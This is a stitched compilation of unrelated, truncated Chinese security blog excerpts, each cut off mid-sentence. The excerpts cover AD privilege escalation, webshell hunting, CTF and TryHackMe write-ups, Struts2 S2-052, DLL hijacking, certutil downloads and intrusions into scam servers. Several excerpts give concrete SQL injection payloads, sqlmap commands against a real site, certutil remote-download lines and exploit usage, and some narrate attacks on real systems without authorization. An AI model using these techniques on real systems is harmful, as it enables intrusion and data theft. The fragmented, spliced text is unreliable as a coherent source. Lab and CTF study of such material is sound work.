红队攻击面相关讨论

前情提要上回故事说到，骗子服务器的最高权限虽然已经拿到，但这也只是技术层面的掌控，想要立案，需要提供尽量多的人员相关信息，如手机、银行卡等，但这些目前都并未采集到（前面虽然提到了某次源码有个银行账户，但后面发现那只是个测试号，百度出来一堆在用的…），所以还需要通过一些额外的手段去获取有用的信息； 信息收集宝塔后台首先想到的就是之前一直留着没进去的宝塔面板后台，里面应该会有些登录信息之类，但并没有得到登录密码，但这也并没有太大影响，因为现在可以直接访问宝塔的数据库文件（panel/data/default.db， sqlite数据库文件），所以直接进去备份个账户然后设置个密码，防止把正常账户挤下去： 清理下日志，然后就是愉快的登录进去 ㄟ( ▔, ▔ )ㄏ： 首先看到的就是账户名，想是管理员的手机号，这里看不全，去设置里面瞅瞅： 这里也是中间四位打了星号，从源码里也看不出，但这些也都是纸老虎，因为随后审查发现一处接口请求数据，返回信息里是完整的手机号，微信搜了下也有这个这么个账户： 但其真实性未知，多半只是个幌子，先记着吧； 新起点在之后某个时间点准备继续收集信息的时候，发现其域名甚至IP都无法再访问了，后面几天试了也都不行，感觉可能是收割完一波然受卷款跑路了；自然，除了一些信息，之前获取的所有权限，都化作泡影了；也是在这之后，警察蜀黍竟主动联系了过来（没有喝茶，俺是良民 $_$），由于想着再碰碰运气看看，结果有趣的事再次发生了，访问之前那个IP展示出了这么个页面： 好吧得承认，那一瞬间确实差点信了这标题和图标，还浪…

Active Directory中获取域管理员权限的攻击方法 译：by backlion 0x00 前言 攻击者可以通过多种方式在Active Directory中获得域管理员权限, 这篇文章是为了描述当前使用的一些当前热门的内容, 这里描述的技术“假设违规”，攻击者已经在内部系统上获得权限，并获得域用户认证凭据（又称后渗透利用）。 对于大多数企业而言，不幸的事实是，攻击者通常不会花更长时间从普通域用户转到域管理员。受害者的问题是："这是怎么发生的？"。攻击者经常以鱼叉式的钓鱼电子邮件开始给一个或多个用户发送邮件，使被攻击者能够在目标网络中的计算机上运行他们的代码。一旦攻击者的代码在企业内部运行，第一步是进行信息收集，以发现有用的资源来进行提权、持久性攻击，当然，还包括截取信息。 虽然整个过程细节各不相同，但总体框架仍然存在： 1.恶意软件注入（网络钓鱼，网络攻击，等等） 2.信息探测（内部） 3.凭据盗窃 4.攻击与权限提升 5.数据访问和泄露 6.持久性（会话访问） 我们从攻击者获取到企业内部普通权限开始，因为在当前环境网络中通常并不困难，此外，攻击者通常也不难从普通客服端上的用户权限提升为具有本地管理员权限。此用户提权可以通过利用系统上未修补的补丁漏洞或更频繁地发现在SYSVOL中查找到本地管理员的密码，例如组策略首选项。 0x01 SYSVOL和组策略首选项中的密码获取 这种方法是最简单的，因为不需要特殊的“黑客”工具，所有的攻击方法必须是打开Windows资源管理器并搜索域名为SYSV…

连接上靶机过后 直接查看日志 cd /var/log 发现是通过apache搭建的web服务 也可查看外联和端口开开放情况 netstat -pantu 这里也可以确定开启了apache服务 也确实为apache + php 接下来查看木马文件 一个一个文件看不现实 直接使用find命令去匹配shell字段中可能存在的敏感字段去查找webshell find ./ -name "*.php" |xargs grep "eval(" 查找到三个文件 下面来看第一个./include/gz.php 发现第一个隐藏的flag flag{027ccd04-5065-48b6-a32d-77c704a5e26d} 其实这个一眼可以看出来是哥斯拉 哥斯拉php马特征 session_start() 创建或者重启一个会话 @set_time_limit(0) 设置程序最长运行时间 永远 @error_reporting(0) 关闭错误报告 $key=xxxxxxxxx 加解密的盐值 哥斯拉php马的利用逻辑： 第一次通信时，服务端通过POST方式传递一个名叫pass的参数给木马，给pass参数赋的值是加密后的一组用”|”隔开的方法，也就是接下来要使用的攻击荷载。荷载在解密后被存入SESSION，供之后使用。 从第二次通信开始，pass传入的是远控命令，通过攻击荷载中的run()方法执行远控命令。然后对回显进行加密后传输给哥斯拉的服务端。 所以第二个flag就是Godzi…

0x01 前言Date/time：2015年，这次渗透测试中发现已经拿下的几台机器的管理员密码存在一定规律性，最终通过分析密码规律、组合新密码成功拿下目标整个C段机器权限，个人感觉这是个不错的内网通用/规律密码实战案例，所以想着还是记录一下吧。 0x02 Getshell过程网站基本信息探测： 目标站点：http://www.that****elos.com.br 服务器IP：189.**.**.204（巴西） 环境平台：ASP.NET 服务器系统：Windows这个网站禁止国内IP访问，所以只能上墙去做测试了，先用Chrome浏览器插件和指纹识别网站都未能得到服务器系统具体版本，不过根据个人经验猜测这应该是台Windows2003。 Chrome浏览器插件：Server Details 1.0.12、Wappalyzer 服务器系统识别：http://fuwuqixitongshibie.51240.com/?q= 网站后台地址：http://www.that****elos.com.br/admin/接着我们用Safe3WVS_v10.1漏洞扫描工具成功找到几处注入，并使用sqlmap工具验证这个注入点确实是存在的，并且已经跑出管理员的表和列，只不过在跑管理员用户密码时报错了。 跑表名： sqlmap -u "http://www.that****elos.com.br/detalhe_produto.asp?codProd=510" --tables [7 tables]：categorias，clientes，destaque…

前提 房间地址：https://tryhackme.com/room/overpass 两个问题 实战 靶机地址：10.10.109.42 扫一下 开放了ssh 以及80 我们是肯定需要进ssh的 gobu扫一下 当然我们也能dirb or dirsearch扫一下 进入admin 我们查看源代码 当然从扫描结果来看 把login.js暴漏出来了 这说明他不一定是让我们爆破 而是想办法绕过这个js 让我们代码审计一下 学过js的都知道 Windows.location是跳转的意思 这里的意思就是携带cookie就跳转到admin 这是我之前写的PHP登录页面 期中我们用<script> </script>就是写一段js 其中就使用JS进行Window.location跳转 我们看一下cookie.js(好像没什么用) 原来那个我能看出来 这挤一块了(实际上在互联网上正常的JS也是挤一块的),第一个才是另类, 不过看着有点难受 我们通过浏览器给我们整理一下看看吧 没看出个什么东西 再次折反过来分析login.js 这里需要把cookie设计成status0RCookie进行访问就能跳转/admin 那么好我们去试试…

这种方法是最简单的，因为不需要特殊的“黑客”工具。所有的攻击必须做的是打开Windows资源管理器，并搜索域名为SYSVOL DFS共享的XML文件。在大多数情况下，以下XML文件将包含凭据：groups.xml，scheduledtasks.xml和＆Services.xml，Printers.xml ，Drives.xml. SYSVOL是所有经过身份验证的用户具有读访问权限的Active Directory中的域范围共享 SYSVOL是指存储域公共文件服务器副本的共享文件夹，它们在域中所有的域控制器之间复制。 Sysvol文件夹是安装AD时创建的，它用来存放GPO、Script等信息。同时，存放在Sysvol文件夹中的信息，会复制到域中所有DC上。 SYSVOL包含登录脚本，组策略数据以及需要在任何有域控制器的任何地方可用的其他域范围数据（因为SYSVOL在所有域控制器之间自动同步并共享）。所有域组策略都存储在这里：\\ <DOMAIN> \ SYSVOL \ <DOMAIN> \ Policies \ 注意：C:\Windows\SYSVOL目录下，只有创建组策略脚本登录才能有策略脚本配置文件groups.xml,默认是没有的 当创建新的GPP时，在SYSVOL中创建了一个与相关配置数据相关联的XML文件，如果提供了密码，那么AES-256位加密应该足够强的。 用于加密任何域中的所有组策略首选项密码的32字节AES密钥： https://msdn.microsoft.com/e…

一、前言 以下列检测脚本示列： import requests import urllib3 import re,string,random from urllib.parse import urljoin import argparse import time import ssl ssl._create_default_https_context = ssl._create_unverified_context urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def banner(): print() print(r''' ______ _______ ____ ___ ____ _ _ ____ ___ _____ __ / ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \ / _ \___ / /_ | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) | | | | / / '_ \ | |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/| |_| |/ /| (_) | \____| \_/ |_____| |_____|\__…

前言 靶场地址：https://ctf.show/challenges 如果此时此刻还没burpsuite可以用开盒即用版的(域这里用的就是 最新BurpSuite2023专业汉化版下载（无需任何配置） 2年前29106110 Web21 这里进行抓包 这里可以看到他是通过Base64进行编码的 选择狙击手模式 密码字典下载他们给我们用的字典 我们要对admin:后的密码进行爆破所以需要截取一下 添加前缀 进行base64编码 url取消打勾(这里要进行base64编码 =会造成编码失败 Web22 Web22ctfshow挂了 Web23 打开一看 分析一下 这里包含了一个flag.php 需要满足条件输出 这里是isset是检查是否get传参token这个参数,如果传参了就进入if里 下一步将传参…

1.pyc 使用pyc在线反编译得到python源码： #!/usr/bin/env python # visit https://tool.lu/pyc/ for more information # Version: Python 3.8 import random def encrypt_file(file_path): random.seed(114514) # WARNING: Decompyle incomplete file_path = "./flag" encrypt_file(file_path) 然后使用AI分析可得到它对应的解密脚本 import random import os def decrypt_data(encrypted_data): random.seed(114514) decrypted_data = bytearray() for byte in encrypted_data: key = random.randint(0, 128) decrypted_data.append(byte ^ key) return decrypted_data def read_file(file_path, mode='rb'): with open(file_path, mode) as file: return file.re…

一、脚本的语法格式 大小写敏感 缩进：使用缩进表示层级关系,YAML 使用空格进行缩进，通常每个缩进级别为两个空格。 键值对：YAML 通过键值对来存储数据，键和值之间用冒号 : 分隔。 列表：使用短横线 -来表示列表中的项。 注释：以 # 开头的行是注释。 字符串：字符串可以不使用引号，也可以使用单引号或双引号 id不能有中文、特殊字符、--以及空格等内容，id这个参数，您可以理解为是输出的标题，一个简单易懂的ID，可以让您更快的判断出 info：信息块，名称 、 作者 、 严重性 、 描述 、参考和 标签 ，这些都属于信息块的范围，一般情况下，我们只需要写入名称、作者、严重性、描述、标签这几项即可 name：模板名称，这个建议跟id相同即可 severity：严重性，这里不可以使用中文，一般用critical、hight、Medium、info来表示威胁等级 description：漏洞介绍，这里可以使用中文，也不限制特殊字符，一般是用来做漏洞介绍用的，可以方便使用者了解该漏洞的具体说明 tags：标签，是为了给漏洞加一个标签，方便进行统一扫描，例如：tags: seeyon(切记不要用中文哈) 日常编写nuclei的yaml脚本，nuclei内置cookie-reuse属性，在发起多个请求时,需要保持会话,可以添加cookie-reuse: true来保持多个请求时会话得到保持,这在有身份验证时很有用。 如果匹配失败的话可以使用-debug来获取请求包和返回包进行调试，使用Burp抓包直接将请求包内容粘贴即可 二、Nucl…

sessionkey引入 微信sessionkey是微信小程序开发中用于标识用户会话的一串密钥。当用户在微信小程序中进行登录操作时，微信服务器会返回一个session_key，开发者可以使用这个session_key来获取用户的身份信息或进行加密通信. 如果sessionkey泄露就可以进行获取用户信息,伪造登录. 师傅404Xyunxi就是通过sessionkey打的 拿到了江西财经大学的证书 [5.20]提交的某edusrc平台案例 此次案例就是通过sessionkey泄露达到伪造登录的 期中此次信息搜集的骚操作方法来自师傅404Xyunxi,收益匪浅 伪造登录工具:Wx_SessionKey_crypt 发现漏洞一:sessionkey泄露 点击登录 抓取数据包 微信session key泄露 伪造登录需要手机号 从抖音信息搜集到手机号 在抖音搜索相关平台信息,得到泄露的手机号 得到私人手机号187291***** 伪造登录 1.先解密自己的： 2.在伪加密替换成他的 替换encrypetdData,成功伪造登录 每次替换的时候encryptedData和iv都会改变,所以每次的包都不同,这里就不提供数据包了 发现漏洞二:逻辑缺陷 使用自己的手机号再次点击登录 无法登录 此…

前言 本文主要通过一个案例来演示一下当MSSQL是DBA权限，且不知道路径的时候如何去获取WEBSHELL。当然这种方式对站库分离的无效。 我测试的环境是在Win7 64位下，数据库是SQLServer 2000，IIS版本是7.5，程序是采用风讯的CMS。后台登录后有多处注入，因为这里是演示用注入获取WEBSHELL，因此就不考虑后台上传的情况了，只是用注入来实现。 过程 首先找到一个如下的注入点： http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1' and 1=user;-- 通过SQLMAP可以查看到是DBA权限 创建临时表 http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';CREATE TABLE tt_tmp (tmp1 varchar(8000));-- 在WINDOWS下查找文件用如下命令： for /r 目录名:\ %i in (匹配模式) do @echo %i 例如在C盘下搜索NewsList.aspx，可以使用for /r c:\ %i in (Newslist*.aspx) do @echo %i或者for /r c:\ %i in (Newslist.aspx*) do @echo %i 使用for /r c:\ %i in (Newslist*.aspx) do @echo %i的搜索结果 一定要在匹配模式里面加上一个*号，不然搜…

一、前言 HFish 是一款基于 Golang 开发的跨平台多功能主动攻击型蜜罐钓鱼平台框架系统，为了企业安全防护测试做出了精心的打造 发布版本下载链接： https://github.com/hacklcx/HFish/releases Github: https://github.com/hacklcs/HFish多功能 不仅仅支持 HTTP(S) 钓鱼，还支持支持 SSH、SFTP、Redis、Mysql、FTP、Telnet、暗网等蜜罐扩展性 提供 API 接口，使用者可以随意扩展钓鱼模块 ( WEB、PC、APP )便捷性 使用 Golang 开发，使用者可以在 Win + Mac + Linux 上快速部署一套钓鱼平台二、集群搭建1.环境说明：client01:66.42.68.123（客户端1）clinet02:144.202.85.37（客户端1）server:104.156.253.44（服务端）2.服务端安装与配置root@server:~# wget https://github.com/hacklcx/HFish/releases/download/0.6.4/HFish-0.6.4-linux-amd64.tar.gzroot@server:~# tar zxvf HFish-0.6.4-linux-amd64.tar.gz root@server:~# vi config.ini #需要将statuse修改为1，后台密码修改为复杂密码，db_str数据库生产环境建议采用mysql远程…

内网安全运营 内网安全运营，指的是公司内部生产办公网络。一般对于传统企业指的的是生产网络（工控网络），办公网络一般指企业公司内部系统（文档服务器、OA系统、财务、专利、人力等业务系统）和员工的办公电脑网络；对于互联网或者IT企业，生产网络一般只对外提供服务的网络（官网、主站点、CDN等等），办公网络与传统企业一致，测试网络指的是用于开发测试环境的网络，推荐在互联网或IT类企业中做到三网分离。 生产网络安全运营 对于生产网络，采取的运行策略和办公内网的技术思路相似，但是业务思路不同。第一，生产网络对于互联网企业来说是企业的生命线、业务不能断，类似金融机构组织的办公网络。所以第一先考虑保业务可用和业务数据。最好做到双份系统甚至多份系统，对于发现的漏洞优先修复一部分暂未在线提供业务的备份节点，在修复成功后，主备交替，再修复原来的主节点，现在的备份节点。此外生产网络最需要稳定，对外应该只开放业务需要的端口，对内从办公网络访问生产网络应该经过堡垒机，做到充分认证和审计。 办公内网安全运营 对于办公内网，要形成高防区，对于AD、DHCP、DNS、、OA、Email、ERP、CRM、专利、财务、招聘、法务、投资、文档、IM通讯、WiKI、项目、版本控制等重点敏感系统应放入高防区。充分收集日志，做到审计与预警监控并举，重点保护这些系统。这些系统只需对外开发业务需求端口即可，网关网段（维护网）应该单独设置访问权限，并与内网逻辑分离。对于基本的员工主机应该上统一的HIDS类产品，例如众多卫士和管家等，最好可以内网运营这些HIDS的控制节点。 测试…

漏洞描述： 2017年9月5日，Apache Struts发布最新安全公告，Apache Struts2的REST插件存在远程代码执行的高危漏洞，该漏洞由lgtm.com的安全研究员汇报，漏洞编号为CVE-2017-9805（S2-052）。Struts2 REST插件的XStream组件存在反序列化漏洞，使用XStream组件对XML格式的数据包进行反序列化操作时，未对数据内容进行有效验证，存在安全隐患，可被远程攻击 漏洞编号: CVE编号:CVE-2017-9805 漏洞复现: 利用弹出计算器复现： 漏洞环境为：win2008sr2+tomcat9.0 1.从struts2的官网下载最后受影响的版本struts-2.5.12，其下载地址： http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip 拿到struts-2.5.12-apps之后，将其中的app目录下的struts2-rest-showcase.war文件放到webapps目录下，我的是 D:\apache-tomcat-9.0.0.M26\webapps 2.浏览器中访问地址：http://ip地址:8080/struts2-rest-showcase/ 会跳转，然后出现下面的页面： 3.点击一个edit进行编译页面，然后提交，并用burp抓包。 并发送到repeater进行修改包如下： 这里将： Content-Typ…

一、js代码分析之编码转换writeup:打开index.html <script src="script-min.js"></script> //首先调用.js脚本 <script type="text/javascript"> var ic = false; #默认ic值为false var fg = ""; function getFlag() { //function函数内的getfFlag按钮会触发相应事件 var token = document.getElementById("secToken").value; // #获取文本输入框中的值赋值给token ic = checkToken(token); //调用checkToken(token)这个函数进行检查赋值，该函数包在.js脚本中包含 fg = bm(token); //调用checkToken(token)这个函数进行赋值 showFlag() //定义showFlag() 函数 } function showFlag() { …

一、dll的定义 DLL(Dynamic Link Library)文件为动态链接库文件，又称“应用程序拓展”，是软件文件类型。在Windows中，许多应用程序并不是一个完整的可执行文件，它们被分割成一些相对独立的动态链接库，即DLL文件，放置于系统中。当我们执行某一个程序时，相应的DLL文件就会被调用。一个应用程序可使用多个DLL文件，一个DLL文件也可能被不同的应用程序使用，这样的DLL文件被称为共享DLL文件。 如果在进程尝试加载一个DLL时没有指定DLL的绝对路径，那么Windows会尝试去按照顺序搜索这些特定目录时下查找这个DLL,只要黑客能够将恶意的DLL放在优先于正常DLL所在的目录，就能够欺骗系统优先加载恶意DLL，来实现“劫持” 二、dll的原理利用 2.1 Windows XP SP2之前 Windows查找DLL的目录以及对应的顺序： 1. 进程对应的应用程序所在目录； 2. 当前目录（Current Directory）； 3. 系统目录（通过 GetSystemDirectory 获取）； 4. 16位系统目录； 5. Windows目录（通过 GetWindowsDirectory 获取）； 6. PATH环境变量中的各个目录； 例如：对于文件系统,如doc文档打开会被应用程序office打开，而office运行的时候会加载系统的一个dll文件，如果我们将用恶意的dll来替换系统的dll文件，就是将DLL和doc文档放在一起，运行的时候就会在当前目录中找到DLL，从而优先系统目录下的DLL而被…

0x00 概述 某天，一位网上朋友告诉笔者，他被骗了。被骗方式很独特，因为自己没钱所以选择贷款，在贷款过程中惨遭诈骗。 诈骗短信： 0x01诈骗过程 （此处受害者用小辉代替） 某日，小辉手机收到一条关于网络贷款的短信，恰逢月底，捉襟见肘，小辉没忍住诱惑下载打开了app。注册好账号，填写好身份证号、手持、工作地点、家人信息等后申请了20000元贷款，但是迟迟没到账，小辉询问客服得知：亲，这边申请贷款需要先缴纳688的VIP费用哦，缴纳后VIP费用会连同贷款金额一起打款到您的银行卡账户。小辉想了想，也不亏，于是将下个月房租开通了VIP待遇。 小辉开通了VIP待遇，以为就能顺利贷款度过月底，但是还是没收到贷款金额以及VIP费用。这次客服主动联系小辉，"您的信用额度不够，需要再刷流水3500元，请缴纳现金证明还款能力，缴纳后费用会连同贷款金额一起打款到您的银行卡账户"。 小辉急了，眼看着下个月房租没着落了，咬咬牙找朋友借了3500元再次打给客服提供的银行卡号，心想，这次你总没什么借口了吧！20000块钱，拿来吧你！小辉已经想好贷款下来两万块如何吃喝玩乐了～～～ 可是幸运女神还是没有照顾小辉，客服再次联系小辉，称已经审批成功即将下款，但是还需要支付3000的工本费用，且费用会连同贷款金额一起打款到银行卡账户，小辉傻眼了，紧接着，客服将后台生成的虚假的合同发送给了小辉。 小辉急了，自己就贷个款而已，却损失了几千块钱还要上征信，关键贷款的钱还没到手！小辉眼看着事情越闹越大，找到了我，经过小辉的一番描述…

前言 细讲SQL注入 [SWPUCTF 2021 新生赛]sql 既让sqlmap工具跑不出来,又让手注不是很难,题出的很用心 地址:[SWPUCTF 2021 新生赛]sql | NSSCTF 用到的知识 确定注入参数 字符型 判断闭合符号 如上是单引号 判断回显位置 发现waf 空格被过滤 –+被过滤 绕空格过滤的方法 %09,/**/ 绕过–+注释符的方法: %23(#) 查询回显位置 ?wllm=1'order%09by%092%23 ?wllm=1'order/**/by/**/3%23 两个回显位置 判断列数 1'order/**/by/**/3%23 发现3列正常回显 4列报错 使用select一样的效果 说明一共有三列 查询数据库 -1'union/**/select/**/1,database(),3%23 数据库为test_db 查询表名 这里的前置知识在mysql里information_schema里包含了所有的数据名表名列名 其中information_schema.tables里包含了所有的表 group_concat…

羊城杯-2024webweb2进题信息搜集一下，dirsearch发现了login路由可访问，先随便点一下，发现了一个文件读取： http://139.155.126.78:30148/lyrics?lyrics=Rain.txt我尝试了一下： http://139.155.126.78:30148/lyrics?lyrics=../../../../../../../../etc/passwd发现可以读取： 本以为是任意文件读取，但是没有这么简单。 所以先尝试一下读取源码，用那个/static/style.css进行尝试： 发现读取文件的目录是在/var/www/html/XXX/这个目录下的，那么尝试一下读取app.py： 找到源码了。那么接下来就好办了，源码附上： import os import random from config.secret_key import secret_code from flask import Flask, make_response, request, render_template from cookie import set_cookie, cookie_check, get_cookie import pickle app = Flask(__name__) app.secret_key = random.randbytes(16) class UserData: def __init__(self, username): self.user…

前言在一个风和日丽的下午，我们正在Blank的带领下，兴致勃勃地讨论着，女人。 而float先生发现了一个访问了他博客的奇怪IP。 哎，根本不把什么网络安全法放在眼里，直接就开打。 Game Start浏览器访问会直接跳登陆界面。 信息收集路径上敲个X。拿到ThinkPHP和版本号。 同时，float先生nmap扫到801端口，并确定是宝塔建站。不过这里没有进一步研究。 RCE尝试5.0.21能直接RCE，且payload满天飞。不过依然遇到了一点小坑。 模块名不是通常的index，而且必须存在。根据跳转登录的uri： /admin/login/index.html 猜测module为admin，果然成功。 disable_functions赫然在列，则rce果然不成功。 种马好消息是写文件成功了。 访问shell.php，看到phpinfo界面。 反手就写冰蝎马连它。 趁机瞅了瞅，贷款、经理、业务员、bc...好，继续打。 连接数据库硬编码还真是宇宙难题，数据库密码到手。 第一次遇到MySQL的密码里有@，直接写会破坏连接串。如： mysql://root:[email protected]:3306/mysql password中的@会提前走到ip:端口的判断。需要把它编码为%40 管理员登录翻web目录和代码实在没有进展了，尝试登录一下系统。 数据库里有账号口令，当然口令是加盐的哈希。 谁家好人头铁非要暴密码出来，直接patch下login代码，不查表就完事了。 登录系统。 这业…

certutil在渗透测测试中的使用技巧 0x01 前言 最近在Casey Smith‏ @subTee的twitter上学到了关于certutil的一些利用技巧。本文将结合自己的一些经验，介绍certutil在渗透测试中的应用，对cmd下downloader的实现方法作补充。 0x02 certutil简介 用于备份证书服务管理,支持xp-win10 更多操作说明见https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).aspx 0x03 渗透测试中的应用 1、downloader (1) 保存在当前路径，文件名称和下载文件名称相同 certutil -urlcache -split -f https://github.com/backlion/demo/blob/master/weblogic.py (2) 保存在当前路径，指定保存文件名称 certutil -urlcache -split -f https://github.com/backlion/demo/blob/master/weblogic.py test.py (3) 保存在缓存目录，名称随机 缓存目录位置： %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content certutil …

前言 房间地址：https://tryhackme.com/room/ignite 一家新成立的公司的网络服务器存在一些问题。 此次我将用Parror hack系统作为攻击机器 实战 靶机地址：10.10.178.214 先给咱的系统升一下root 吐槽一下Thm的VPN 有点拉胯 说明咱们连接不上他们的内网VPN 后来修了修,连上了好了我们开扫 开放了80端口 查看源代码 先登录上再说 可以看见直接文件上传漏洞 在上传之前我们先搜索一下Fuel CMS的漏洞 刚用Parror没有搜到Fuel CMS的漏洞 就用kali搜 漏洞其实还不少… 不过在此使用他们的漏洞我觉得不如自己上传shell 这里看到我们准备的shell 是不行的 所以我们只能用漏洞库的脚本shell了 这里看看他们的用法 在这里试一下 不过我们还是去kali或者parror那里去运行脚本 这里我更换了一个靶机地址：因为老是断 服了 我一怒之下给我的kali和parror都上了”魔法” 我们继续：分析一下脚本的使用方法 使用脚本： python3 50477.py -u http://10.10.234.58 开启监听： …

初赛web_ezcmsswagger泄露test/test测试账号登录，/sys/user/**没有做鉴权，可以添加一个超级管理员用户， 此时仍然不知道roleId。并且role模块没有未授权。继续阅读user模块，发现接口 这里存在roleid泄露，这里填入前面泄露的admin的id fcf34b56-a7a2-4719-9236-867495e74c31 GET /sys/user/roles/fcf34b56-a7a2-4719-9236-867495e74c31此时知道了超级管理员id为 11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9，添加用户 { "createWhere":0, "deptId":"1", "email":"", "password":"123456", "phone":"11111111111", "roleIds":[ "11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9" ], "sex":"fmale", "username":"hacker" }password字段解码失败，然后用test账户查看日志发现了aes的key：AbCdEfGhIjKlMnOp，然后添加用户成功，我们添加用户之后，在模块发现了ping功能，但是有waf，绕过waf执行命令，得到flag POST /sys/ping HTTP/1.1 Host: User-Agent:Mozilla/5.0(Macintosh;IntelMac OS X 10.15; rv:126.…

前言 房间地址：https://tryhackme.com/room/gallery666 本次可以学习到非常多的知识,包括SQL注入,文件上传漏洞,Rce漏洞命令执行,Kali-linux中searchsploit数据库里漏洞脚本的利用,加固Shell以及使用国外脚本梭哈提权. 实战 靶机地址：10.10.171.124 nmap -A -sC 10.10.171.124 两个端口进入8080后是 Cms系统如题目 Simple Image Gallery 用kali自带的searchsploit漏洞查询工具查询一下这个系统的漏洞 searchsploit Simple Image Gallery Sql injection翻译过来就是SQL注入 而且给了传入参数是ID 以’闭合 直接Sign in 传马 还是用冰蝎吧 我喜欢直接用冰蝎反弹shell 但是冰蝎有点傻b 但是我反弹之后一会儿就会断 好烦 这两个傻b软件 所以我们还是回归最原始的shell 用的是我之前文章的shell 发现连了还是断 最后还是用了一句话木马 通过看橘墨的直播我也看他们也是用一句话 才发现shell在吊打靶场不如先一句话方便 我也尝试…